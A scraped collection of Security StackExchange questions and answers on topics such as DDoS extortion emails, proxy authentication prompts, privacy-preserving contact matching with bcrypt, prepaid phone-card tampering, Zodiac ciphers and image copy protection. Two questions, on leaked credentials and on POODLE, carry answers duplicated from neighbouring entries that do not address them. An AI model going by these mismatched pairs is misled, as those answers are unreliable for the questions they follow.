And we pass CloudFlare and others remote protections! So, no cheap
protection will help. Prevent it all with just 10 BTC @ some-bitcoin-address Do not reply, we will not read. Pay and we will know its you. AND YOU
WILL NEVER AGAIN HEAR FROM US! Bitcoin is anonymous, nobody will ever know you cooperated. Obviously, I'm not going to pay the ransom. Should I do anything else? Update: I forwarded the email and original headers to the originating ISP. They replied that "Measures have been taken." So, umm, yay? I guess? | Based on the following article you may simply want to ignore it. This seems to be a common scam and your e-mail looks almost exactly like the one from the following article. http://arstechnica.com/security/2016/04/businesses-pay-100000-to-ddos-extortionists-who-never-ddos-anyone/ Look up the source ISP of the service provider that sent the e-mail and contact their abuse team [email protected] . They may disable the source of the e-mails or alert the unsuspecting customer that may own the machine. Notifying the source ISP is helpful to reduce the amount of this. Make sure you send them an e-mail with full headers. If the source appears to be a compromised system at a large company I would notify them in addition to the ISP. Do this by CC'ing both the company and the ISP at the same time for fastest results. Keep in mind some malicious systems may also be impersonating as a compromised host even though it's not so notifying the ISP may actually be more important than notifying the owner of the system. | {
"source": [
"https://security.stackexchange.com/questions/122336",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/74909/"
]
} |
122,380 | My Chrome browser keeps prompting me for Facebook authentication, even though I have never logged on to Facebook from my PC. I am using Chrome browser from my company where they have a strong proxy to avoid social networking sites. Though, I never even tried to open Facebook or any application/site related to FB. But I am constantly getting this pop up when ever I open any site. Is that a security threat? Edit I am sorry but I don't have any knowledge about proxy server configuration. However, I can tel you about configuration of proxy account: Well there are two scenarios, by default Automatically detect setting is enabled which doesn't allow us to access anything other than intranet site. However, when I am connected to VPN then I am able to use another proxy which allow me to access Google & other technical sites. (I can access Gmail, SO, Blogs but not Facebook) | TL;TR: it is probably a BlueCoat ProxySG or similar proxy which can be configured to behave that way. Nothing to worry about. Details: What you see is a dialog for HTTP basic access authentication . This is not what Facebook uses for authentication. This means that this dialog is not from Facebook itself. My guess is that facebook.com is filtered by your "strong proxy to avoid social networking sites" but that access to this site is allowed for some authorized users. Thus what you see here is the authentication requested by the proxy you use. Usually proxy authentication is different from site authentication and it would show you that the proxy and not facebook requires authentication. But some software/appliances can be configured to issue a site authentication when used as a transparent proxy, i.e. when not being explicitly configured as proxy inside the browser. One such proxy software is BlueCoat ProxySG. From their documentation it can be seen that it will return a site authentication (code 401) instead of proxy authentication (code 407) when used as transparent proxy: The ProxySG appliance issues an OCS-style challenge ( HTTP 401 ) for the first connection request from an unauthenticated client. This leaves the question why you get this authentication request everywhere. My guess is that you don't get the dialog everywhere but on all sites which embed the Facebook Like button, which is almost everywhere. The site connect.facebook.net you see in the dialog is the Facebook SDK for the Like button. | {
"source": [
"https://security.stackexchange.com/questions/122380",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/95560/"
]
} |
122,392 | For example, see this story. Am I missing something here? Are the login details actually still encrypted? I don't understand how it is possible for a data breach of what I assume is encrypted information (GMail, Yahoo etc) to end up in an exploitable form (which I assume is only plaintext?). | TL;TR: it is probably a BlueCoat ProxySG or similar proxy which can be configured to behave that way. Nothing to worry about. Details: What you see is a dialog for HTTP basic access authentication . This is not what Facebook uses for authentication. This means that this dialog is not from Facebook itself. My guess is that facebook.com is filtered by your "strong proxy to avoid social networking sites" but that access to this site is allowed for some authorized users. Thus what you see here is the authentication requested by the proxy you use. Usually proxy authentication is different from site authentication and it would show you that the proxy and not facebook requires authentication. But some software/appliances can be configured to issue a site authentication when used as a transparent proxy, i.e. when not being explicitly configured as proxy inside the browser. One such proxy software is BlueCoat ProxySG. From their documentation it can be seen that it will return a site authentication (code 401) instead of proxy authentication (code 407) when used as transparent proxy: The ProxySG appliance issues an OCS-style challenge ( HTTP 401 ) for the first connection request from an unauthenticated client. This leaves the question why you get this authentication request everywhere. My guess is that you don't get the dialog everywhere but on all sites which embed the Facebook Like button, which is almost everywhere. The site connect.facebook.net you see in the dialog is the Facebook SDK for the Like button. | {
"source": [
"https://security.stackexchange.com/questions/122392",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/92420/"
]
} |
122,412 | We have a mobile app that, given two users, needs to let them see what common contacts they have based on their phone numbers. How can we do this in a cryptographically secure way and respecting the users' privacy (i.e. without sharing the numbers in plain-text between them or with a server)? Our current solution is: (On phone A) Generate a single random salt. (On phone A) Take all phone numbers from phone A and generate a SHA512 hash with multiple rounds for each phone number using the salt generated from step 1. Something like sha512(sha512(sha512(phonenumber + salt) + phonenumber + salt) + phonenumber + salt) . (On phone A) Send these hashes along with the salt to phone B (via a server). (On phone B) Repeat step 2 to generate hashes for its own phone numbers using the same salt generated on phone A. (On phone B) Compare the two list of hashes - a matching hash means a matching phone number, and therefore a common contact. Is this a flawed approach, prone to rainbow-tables/brute-force attacks, and if so is there any other solution that is more suitable? Maybe using bcrypt with a given salt is better than doing multiple rounds of sha512 ? | bcrypt would be a somewhat better approach because it is designed to be (programmably) slow. Using a large enough salt and a reasonable complexityFactor, bcrypt(salt + number, complexityFactor) should yield a viable hash and you avoid "rolling your own cryptography", which could possibly turn out to be a difficult sell. To increase security you just crank up complexityFactor . An attacker would now have to generate the bcrypt not only of every 10-digit phone number (which could be feasible: there are only 10 10 numbers after all), but of every possible salted sequence. With a 10-character base64 salt (60 bits of entropy), the complexity increases of twenty orders of magnitude. Brute forcing Suppose you have 1,000 contacts . The CPU of your average phone seems to be two orders of magnitude slower than a server core array. I think it's reasonable to say that it will be three orders of magnitude slower than a semi-dedicated GPU implementation of bcrypt , which is said not to be so efficient . So we tune bcrypt to take 100 milliseconds for each encoding. This means that we need 1 minute 40 seconds to generate our 1,000 hashes, which is a reasonable time for one thousand contacts (a progress bar seems in order). If the user only has 100 contacts, he'll be done in 10 seconds. The attacker, given the salt of one number, has to generate perhaps 10 8 numbers to reasonably cover the mobile number space (the first number, and possibly the first two, aren't really 10 or 100 -- I count them as 1). It will take three orders of magnitude less than 10 8 times 100 milliseconds, i.e. than 10 7 seconds. This is down to 10 4 seconds, or around two hours and a half (or a whole day if the GPU optimization thingy turns out not to work). In less than four months, the whole 1,000 contacts will have been decrypted - using one optimized server. Use ten such servers, and the attacker will be done in two weeks . The problem, as pointed out by Ángel's answer and Neil Smithline's comments, is that the key space is small . In practice user A will produce something (a hash block, or whatever) to be made available somehow to B. 
User B must have a method that works like matches = (boolean|NumberArray) function(SomethingFromA, NumberFromB) (little changes if the second parameter is a set of N numbers, since UserB can build a set using one true number and N-1 numbers known to be fake or not interesting. It can lengthen attack time by a factor of N). This function works in a time T... actually this function must work in a time T short enough that user B, in a commercial real world application, is satisfied. Therefore one bound we can't easily dodge is that M numbers must be checked in an acceptable time on an average smartphone . Another bound we can't reasonably dodge is that User B can supply fake numbers to the algorithm (i.e. people that aren't really contacts, and possibly do not even exist). Both bounds also are enforced if the checker is on a third server; this only assures a lower execution time limit that can thwart some scenarios, such as "decrypt all UserA's numbers", but not others such as "verify who has this number", as in drewbenn 's answer). From these two bounds arise the fact that using a smartphone (or a third party server with minimum execution time enforcement), cycling through all 10 8 reasonable numbers takes about 10 8 smartphoneTime time, or on the order of one thousand months. Attack strategies to decrease this time are distributing the attack between several verifiers, or running it on a non-throttled and faster server (this requires the algorithm being available, but assuming the contrary is security through obscurity), and they look both feasible and affordable. A loophole? One possibility could be to introduce a small probability of false positives . I.e., the above oracle function will occasionally (say once every ten thousand contacts), and deterministically on UserA's input, return true to one of UserB's numbers. This means that the brute force attack on 10 8 numbers will yield UserA's contacts mingled with 10 4 other numbers. Determinism on UserA's input means that two successive checks on these 10 4 found items won't further whittle them. Unless UserB's can grab a different copy of UserA's input, which will yield a different set of false positives and allow filtering the true contacts as the intersection of the two sets, this may make the bruteforced answer less appealing. This comes at a cost - honest UserBs will have to get the occasional false hit. We really can't win If UserB must be able to answer the question "Is number X among UserA's contacts?" in a reasonable time with certainty, the time expenditure is linear , because the system cannot prevent two such requests from being made against numbers X1 and X2, and time for request X2 will be the same for request X1. Therefore, solving two numbers will require double that reasonable time; by induction, solving for N numbers will entail N times that reasonable time ( not , say, N 2 ). The difference between a legitimate request and an attack is that the attack will work on a space ten to a hundred thousand times larger. Being linear, it will require a time up to one hundred thousand times longer... but it also may run on a machine or group of machines one hundred to one thousand times faster. Therefore, our attacker will always be able to decrypt all of UserA's contacts in a "still not unreasonable" time. The only serious check to this would be for the checks to be run on a third, trusted machine with rate limiting and the means of detecting a likely attack. 
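To make the mechanics concrete, here is a minimal sketch (my own illustration, not part of the original scheme) of that match function, assuming a shared bcrypt salt produced by phone A and the common bcrypt Python package; the phone numbers and work factor are placeholders:

```python
import bcrypt

# Phone A: one shared salt (which also encodes the work factor), sent to B.
salt = bcrypt.gensalt(rounds=12)  # higher rounds => slower oracle

def digest(number: str) -> bytes:
    # A real app would normalise the number first (country code, spacing, ...).
    return bcrypt.hashpw(number.encode(), salt)

contacts_a = ["+15551234567", "+15559876543", "+15550001111"]
hashes_from_a = {digest(n) for n in contacts_a}  # what A actually sends

# Phone B: hash its own contacts with the same salt and intersect.
contacts_b = ["+15559876543", "+15557770000"]
matches = [n for n in contacts_b if digest(n) in hashes_from_a]
print(matches)  # ['+15559876543']
```

Each test costs one full bcrypt evaluation, which is exactly the linear-time bound discussed above: Bob pays it once per genuine contact, Eve pays it once per candidate number.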
To thwart an attacker we need something bad to increase with the increase of N, and since it can't be running time (which doesn't increase enough), I think the only resort left is the probability of false positives. The attacker will still get the answer, but we might still succeed in making a bruteforced answer less usable. One simplistic implementation (poor man's Bloom filter) To answer Mindwin's comment, the local algorithm can't work by hiding information - the information must be missing in the first place, otherwise we'd be still be doing security through obscurity. One method would be for UserA (Alice) to send over the bcrypt salt for her (say) 1000 contacts, followed by 1000 incomplete bcrypt hashes. If the hashes are truncated at the i-th byte, there will be pseudo-random collisions. Among UserB (Bob)'s contacts, which are few, collisions will be very rare (unless i is really small). Among the attacker(Eve)'s whole number space, collisions will be significant. Note that phone number distribution is not flat, so Eve can have ways of whittling those collisions by removing, say, unused numbering sequences. If every contact hash has a probability of collision of one in a thousand, Bob, checking his one thousand contacts, has a probability of (1 - 1/1000) 1000 of having no collisions at all - that's 70%, not so good. If collision probability is 1/10000, Bob with one thousand contacts will have 90% chances of not getting even one collision. On a hundred contacts only, no-coll probabilities for Bob are 90% and 99% respectively. Eve, verifying 10 8 numbers, even with p = 1/10000, will always get ten thousand collisions no matter what. Sending two or more hashes with higher collision probability does not change things much for either Bob or Eve, in comparison to sending a single hash with collision probability equal to the product of the separate hashes. For example instead of 1 round with p = 1/10000, use two rounds with p = 1/100, since 1/100*1/100 = 1/10000. So Alice sends two sets of unordered incomplete hashes, with different seeds, and higher collision probability of 1%; Bob will test his 1000 contacts and get positive matches for the 100 contacts he has in common; the remaining 900 shouldn't match, but since the hash is incomplete, 1% of them will, that means 9 spurious contacts, and Bob will end up with 109 likely candidates after running 1000 tests. He now has to test those 109 with the second hash, which also has 1% probability. The 100 true intersections will still match. Of the remaining 9, likely none will pass. The chance of a contact passing two such rounds is 1% of 1%, i.e. 1 in 10000, and the chance of having not even one false positive on 1000 nonmatching contacts is (1-1/10000) 1000 , or 90.48%, exactly as before. With the same numbers, Eve will get one million false positives on her first round, and will have to run one million extra tests. 1% of those will match the second round, leaving Eve with ten thousand false positives mixed up with the one thousand contacts from Alice. Eve has had to run 101 million tests instead of 100, and Bob had to run 1109 tests instead of 1000. In proportion, the double-hash scheme impacts Bob harder than Eve. It would be better to use a single hash with higher complexity. The privacy problem of answering the question "Does Alice know number N?" will remain unaddressed - the time to answer that is the same for Bob and Eve. | {
"source": [
"https://security.stackexchange.com/questions/122412",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109734/"
]
} |
122,507 | I'm a TV scriptwriter - and not hugely tech-savvy, so please bear with me... If the police have an email, sent by a suspect over a 3G or 4G network, could they use the IP address (since they know when it was sent) to find out - from the service provider - the precise location the email was sent from? | The problem with this scenario is that emails are typically not sent from the device itself, but from a central service. In order to do what you want, the investigators would have to make a few hops: to the email service (gets the user account details, including the IP the user used to connect with) to the ISP the device used at the time of sending (gets the general location of the connecting IP, or if lucky, the known IP of the user's home) At best, using 3G/4G, investigators might get the cluster of towers the user was in the middle of. No exact location. BUT, with all that info, it might be possible for investigators to breach the phone's data or the user's other accounts and determine the location of the device using the multitude of location services modern devices have (Find My Phone, Facebook, Instagram, etc.) (Insert a whole host of legal issues currently in the news, like Stingray). Edit: You don't specify the country (or reality) you are dealing with. There are some countries that have set up massive detection nets so that every mobile device is physically tracked no matter where it goes. That way, investigators can have a real-time, accurate map of a particular device at any time. | {
"source": [
"https://security.stackexchange.com/questions/122507",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109844/"
]
} |
122,521 | Suppose I have a prepaid public telephone card containing £5 in it. Now I connect this card to my laptop and figure out where in the card £5 is stored. I then change this to £5000, and leave the rest of the card untouched. Wouldn't this modification allow me to make many calls for the total cost of £4900, even if originally I could have only used £5? | Back in the 90s these prepay cards were easily hacked in a number of ways. First, as you said, people could reprogram them with much larger amounts for free calls. A more low-tech method was that they'd simply scratch off or cover the conductive surface on the pin which decreased the amount on the card, allowing for infinite free calls on a one-time topup. These systems are now almost universally obsolete. Modern prepay cards usually use one of two methods. In some cases they'll contain just a numeric identifier (ID) and your balance will be maintained on a remote server, which is the case with many MAN systems. These are usually the most secure, but they have a downside: you need continuous connectivity between the phone system and the remote server. However, in some scenarios (particularly remote areas with poor infrastructure) the validation can't be done against a remote server. Instead, the prepay card is a smart card (similar to a SIM) with certain functions exposed. Each function requires a different access key. One function is "charge an amount to the card", and the key for this is present in a payphone box. However, this key can't be used to access the "add funds to the card" function, which is only accessible by top-up devices in stores. The keys in top-up devices are kept in tamper-sensitive systems, similar to how chip & pin machines work. The actual amount value on the SIM is kept in an encrypted form within a tamper-proof EEPROM (or similar), with an authenticity record maintained using a key pair deployed in the phones and top-up machines. Attacking these is very difficult, but potentially possible if you compromise a top-up machine. | {
"source": [
"https://security.stackexchange.com/questions/122521",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105521/"
]
} |
122,603 | Alright, so I know this may sound dumb, but I'm having a hard time understanding what an encryption would be since it's different from a hash. I've read up on it, but I'm still not quite sure. So, I was hoping you guys could help me with it. | Encryption vs. Hashing Nobody really "encrypts" a password, although you could... but you'd be encrypting it with another password, and you would need that password to decrypt the first password. When it comes to passwords, we normally hash them. Hashing is simply one-way. You cannot get the string back, you can only check to see if a string validates against a hash. If your string validates against the hash, this does not guarantee that it's the same "password," but you can log in with it because you've found a collision . The "message"/password is usually limited to a small number of characters, relatively speaking. Encrypting is two-way. For example, you have an algorithm, a key, and a message. Using the key, you can unlock the message. Usually, the message could be of arbitrary size. Makeshift Flowchart Examples I made a couple flowcharts that are overly simplified. Hope it helps. See the above? It doesn't make any sense that you would get the "message" back. Why? You're already entering the password, which is the "message" itself. Now look at this: With encryption , you're getting the decrypted message back if the decryption key is correct. You use the key to unlock the encrypted contents. With hashing , you already have the "message" if it validates, or a collision. What you enter is the message. | {
"source": [
"https://security.stackexchange.com/questions/122603",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109966/"
]
} |
122,607 | The Zodiac Killer was a serial killer in the late 60's and early 70's. The twist is, he would frequently taunt the local press with cryptic letters. Four of these letters were actually encoded, but only one has been cracked to date. I'm doubtful that the Zodiac Killer was a master cryptographer, at least not to the degree that one would be considered today. So why haven't his remaining three letters been cracked yet? Is this a technical problem, or is it just not being worked on? Are the letters available to the public for someone to try their hand with? | The Zodiac killer ciphers are an interesting case. As there were four ciphers sent to the local papers, I will address each in turn. They do share some common traits however. They are each their own cipher, so the 'solution' used for cipher 408 cannot be applied to the other messages. Each message has a unique character count. The Zodiac Killer sent these ciphers to newspapers with accompanying plain text messages threatening to commit additional murders (including killing school children) were the ciphers not printed in the papers. 13 The message containing this cipher was sent to the authorities postmarked April 20, 1970. This cipher was prefaced with the plain text "my name is". While the cipher contains 13 symbols, 8 of those symbols are unique. Attempts have been made to find a solution to this cipher using modern computing techniques, however the message is just too short and the possibilities are just too many to determine which 'solutions' are valid candidate solutions. 32 The message containing this cipher was sent to authorities postmarked June 26, 1970. This cipher accompanied a plain text message claiming that when decoded this cipher would lead to the location of a bomb he had buried and set to go off at a later date. The cipher was never decoded and the alleged bomb never found. The cipher had 32 symbols, 29 of which were unique - leaving pretty much nothing to analyze, essentially making it a one time pad cipher. 408 The messages containing this cipher were sent to the Vallejo Times Herald, the San Francisco Chronicle, and The San Francisco Examiner postmarked August 1, 1969. Each letter included one-third of the 408 symbol cipher. On August 8, 1969, high school teacher Donald Harden and his wife Bettye of Salinas, California, solved it, however the solution did not work for the last 18 symbols of the message. The cipher was a homophonic substitution cipher, but not a simple one. Rather than using 1 symbol = 1 letter substitution, The Zodiac Killer assigned multiple symbols to each letter. It is theorized that the last 18 letters of the cipher are filler symbols added to ensure that the three papers received equal portions of cipher text. There have been attempts to find a meaning for this last portion of the cipher "EBEORIETEMETHHPITI" via anagram, however there are 740 billion ways to anagram 18 letters and nothing meaningful has come of these attempts. It's notable however that the rotation of symbols for each letter was consistent across the cipher until the last 18 letters, lending credence to the filler explanation. It's also interesting to note that The Zodiac Killer appears to have been a bad speller, or perhaps they struggled to follow their own code keys, as there are spelling errors throughout the text. It's interesting however that these errors always seem to be made where the incorrect symbol resembles the intended symbol. (e.g.
'MOAT' instead of 'MOST', where the symbol for 'A' is a filled-in triangle and the symbol for 'S' is a triangle with a dot in it. 340 The message containing this cipher was sent to authorities postmarked November 8, 1969. There are a number of notable differences between the 340 cipher and the 408 cipher which make 340 more difficult to 'solve'. The first difference is that it is 68 characters shorter, giving a substantially shorter message to analyze. 7 symbols which appeared in 408 were removed from 340 and 16 entirely new symbols were added in. These changes, in addition to the shorter message, have posed a real problem for analysis efforts. Methods of analysis: Symbol repetition by row and column - 340 has many rows but no columns without repeating symbols, which supports that the text is meant to be read horizontally. There is also a pattern, where the first three rows contain no repeated symbols, and then exactly at the halfway point, another three rows which contain no repeating symbols. This has spawned a theory that the original cipher was created twice as wide, then cut in half vertically to put one side above/below the other as a means of obstruction. Repeating Bigram analysis - when comparing 408 to 340, it is notable that 408 has 62 bigrams whereas 340 only has 25. This is interesting because if you look at bigrams in randomly scrambled cipher text, you will normally get around 20 in a text of this size. This would not support a horizontal text pattern. Additionally, if you cut the text in half, the first half has significantly more bigrams than the second half. This would indicate that something in the cipher is disrupting the naturally occurring bigrams. Repeating Trigram analysis - when comparing 408 to 340, it is notable that 408 has 11 trigrams whereas 340 only has 2. Whatever is disturbing the bigram count does not appear to be disturbing the trigram count. This favors the theory of a horizontal reading direction. Bigram distance analysis - This type of analysis looks at the possibility of symbol transposition. This analysis has been inconclusive and no conclusions have been able to be drawn. Homophonic substitution analysis - Strongest example (symbols L/M) repeats 7 times. Odd/even analysis - Very wide spread of bigram counts. Fewer than 1% of randomized trials show this kind of bigram spread. Notable Oddities Two pivot pairs appear in the cipher text. The chance of this happening naturally once in text of this size is 1 in 50,000. This may or may not be significant. Two strange 'box corner' patterns appear in the text between the 'O' and 'C' symbols. "ZODAIK" seems to appear in the cipher at the bottom left of the last line of text, if you replace a solid triangle symbol with a 'D'. My Conclusion To answer your questions specifically: Why haven't his remaining three letters been cracked yet? 13 is too short. 32 is essentially a one time pad. 340 is short, complicated and nigh-on nonsensical. Is this a technical problem, or is it just not being worked on? It's a technical problem. Without patterns, no amount of pattern analysis is going to make a difference. Are the letters available to the public for someone to try their hand with? Yes. There are multiple forums dedicated to this task. The 340 cipher is still being actively pursued by a dedicated community. There are several forums (http://zodiackillersite.com, http://zodiackillerfacts.com, http://zodiackiller.com) focused on finding a solution.
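For anyone who wants to try their hand, the repeating-bigram count mentioned above is easy to reproduce. Here is a small illustrative sketch (my own, not from the original analysis) that counts, under one common definition, how many adjacent symbol pairs in a transcribed cipher string occur more than once:

```python
from collections import Counter

def repeating_bigrams(symbols: str) -> int:
    """Count bigram occurrences beyond the first for each repeated pair."""
    pairs = [symbols[i:i + 2] for i in range(len(symbols) - 1)]
    counts = Counter(pairs)
    return sum(c - 1 for c in counts.values() if c > 1)

# Toy example; a real test would use a published symbol-by-symbol
# transcription of the 408 or 340 cipher, one character per symbol.
toy = "ABCABDEABFCD"
print(repeating_bigrams(toy))
```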
The shortness of the cipher and the number of symbols pose a real challenge to investigators. It would be interesting to see if an AI like Watson or Deep Blue would be able to make any headway on this, however at this point, to some degree it's academic. No solution to this cipher will be able to bring any peace to those affected by the murders. If you are truly interested in this topic, I would HIGHLY recommend you listen to the video I've listed in my sources and visit the forums. The people who are working on this will be able to go into FAR more depth than I'm able to. Sources: Wikipedia Zodiac Killer Ciphers YouTube - David Oranchak | {
"source": [
"https://security.stackexchange.com/questions/122607",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/91221/"
]
} |
122,687 | My take on reducing the risk of being hacked on products and installation have often been to create false footprints. From my own experience, the servers I've spent most time (and hate) on hacking have been those that have claimed to be something they are not. For example faking services on certain ports that imitate a Windows 2008 server, while in fact the server is a completely different type. Given of course that one takes all normal approaches to system security, first the traditional with code reviews, system hardening etc - then offensive security testing with penetration testers. What are the downsides? I specifically appreciate links to articles and sources on the topic. Am I fooling myself that this has any effect? I know personally that I am triggered by the first sign of a specific system and would waste time. Most likely increasing (A) the chance of me giving up and trying another approach (or another server/service/target) and (B) the chance of discovery and back-tracking from the attacked target. | It's a lot of work. Not only that, but it's a lot of work that your (legitimate) users will never see or benefit from. Most people would be willing to trade off the nebulous risk of deterring a small subset of hackers (realize that APT hackers, in particular, wouldn't be dissuaded and might even find an extra way into your system if you do something wrong setting up your fake services) in exchange for developing real features that will attract real (paying) customers. If you've convinced yourself that you're a real target, sure, set up some honeypots (at least then you can invest in measuring how many attempts are being made on your "misdirection servers"). Security is already expensive, and you're talking about adding extra cost, so make sure it's worth it. | {
"source": [
"https://security.stackexchange.com/questions/122687",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47562/"
]
} |
122,692 | I have a web application whose back-end the Yandex spider has tried to access a few times. After these spider visits, a few Russian IP addresses also tried to access the back-end and failed. Should I block Yandex or take another action? Update: The Yandex spider visits a back-end URL about once every 2-3 days. We did not expose any back-end URL on the front-end. By "back-end" I mean:
the web application's interface that only allows our administrators to manage the application | Should I block Yandex? Why? First, if the bot is a legitimate search engine bot (and nothing else), it won't hack you. If not, blocking a user agent won't help; they'll just use another one. If your password is good, fail2ban is configured, the software is up to date, etc., just let them try. If not, you need to fix that, independent of any Yandex bots. To make sure the problem is actually Yandex, try disallowing it in robots.txt and see if it stops. No => not Yandex. (I set up a new webserver some weeks ago. One hour after going online, without even a domain yet, a "Googlebot" started trying SQL injections against a non-existent WordPress. It was fun to watch, as there were no other HTTP requests. But I did not block Google because of that.) | {
"source": [
"https://security.stackexchange.com/questions/122692",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/93224/"
]
} |
122,760 | We are a healthcare IT company. My machine has PHI on it. Our IT contractor verbally asked if he could remote in to fix my printer so I said sure. I expected some sort of prompt to allow it but he was just in. Some form of VNC I guess. Is this okay? In regards to HIPAA? | HIPAA does not get into the specifics of policy; the substance of it is that organizations have to have sufficient controls in place to protect data. There's nothing inherently wrong with an unprompted takeover from a HIPAA perspective, as long as other controls (authentication, authorization, access control lists, access logging and auditing, antimalware on the support PC, legal agreements in place between the support organization and your organization, etc.) are in place. So without knowing what your organization has in the way of IT security policies, processes and procedures, there's no way to tell. As for whether unprompted take-overs are a good thing: no, they are not. You really want to have a warning when someone is taking over your PC for support, or even looking at your screen. | {
"source": [
"https://security.stackexchange.com/questions/122760",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/76064/"
]
} |
122,766 | I always thought that if a server supports SSLv3 and CBC ciphers, then it is vulnerable to POODLE. But it looks like that is not the case. For example, for Google.com, SSL Labs says that the SSL POODLE attack is mitigated even though it supports CBC ciphers with SSLv3. On further investigation, I found that if SSL Labs detects that a server prefers RC4 over CBC (SSL 3: 0x5 is mentioned next to SSL POODLE result). Now MITM can only provide CBC ciphers to Google.com, then it will only choose CBC (out of what I provide), and it will still be vulnerable to POODLE. But then why does SSL Labs says it is not? | HIPAA does not get to specifics of policy, the substance of it is that organization have to have sufficient controls in place to protect data. There's nothing inherently wrong with an unprompted takeover from a HIPAA perspective, as long as other controls (authentication, authorization, access control lists, access logging and auditing, antimalware on the support PC, legal agreements in place between the support organization and your organization, etc) are in place. So without knowing what your organization has in the way of IT security policies, processes and procedures there's no way to tell. As for whether unprompted take-overs are a good thing then no, they are not. You really want to have a warning when someone is taking over your PC for support, or even looking at your screen. | {
"source": [
"https://security.stackexchange.com/questions/122766",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/81562/"
]
} |
122,848 | Does correcting a misspelled username and prompting the user with a valid username introduce a security risk? I recently tried logging into facebook and misspelled my email. They prompted me with the message below. Log in as {username} {email}@gmail.com · Not You? Please Confirm Password It looks like you entered a slight misspelling
of your email or username. We've corrected it for you, but ask that
you re-enter your password for added security. I know usernames aren't really a secret but when a website fixes a misspelling to a correct one, they seem to be taking the 'not a secret' a little too far. | As you said, you saw this on facebook - so I tried these steps: Login with [email protected] and real password -> works Login with [email protected] and real password -> works, too (!) Login with [email protected] and real password -> also works Login with [email protected] and real password -> also works Login with [email protected] and wrong password -> Wrong password, but email got automatically corrected to the right email Login with [email protected] in a private tab (or a browser with cleared cache & cookies) -> "The email you’ve entered doesn’t match any account" As the correction only seems to work when I have already successfully logged into FB at this PC, I would say that this is not a vulnerability in facebook. Edit: Added new test cases; thanks Zymus, simbabque and Micheal Johnson for the suggestions | {
"source": [
"https://security.stackexchange.com/questions/122848",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/110194/"
]
} |
122,922 | Let me begin by stating that I'm aware it's extremely tedious or virtually impossible to prevent individuals from pirating content. I'm working on a website for a client who is a relatively well-known cartoonist. We're working on methods to prevent users from ripping off his work and republishing it, or more so from reproducing it offline, be it on mugs, or similar. I intend to use WordPress on the backend. I was demonstrating to him how ridiculously easy it is to bypass the disabled right-click. TL;DR: What other methods are there to discourage or deter a user from copying an image and reproducing it? (I'm aware of watermarking, but it really spoils how the image looks.) I've already referred to these questions: Are there DRM techniques to effectively prevent pirating? Is it possible to prevent unauthorized copying or recording of data by photographing screens? Prevent Users from Downloading Javascript, Images | There is no way to block saving of images, but here are some ideas to make it harder. To prevent right-clicking the image to save it, you can overlay a transparent div on it. The user will then right-click the div instead of the image below it and the context menu will not show "Save image as". You could use a data URL to show the image so that there is no separate file on the server to link to. You could use hotlink protection by checking the referer before serving images. Even with all these countermeasures, any user can just make a screenshot of the page and crop the image out of it. Given it is very easy to bypass these countermeasures, you may consider not implementing any anti-downloading functionality at all. Use of the images is already protected by law. | {
"source": [
"https://security.stackexchange.com/questions/122922",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105894/"
]
} |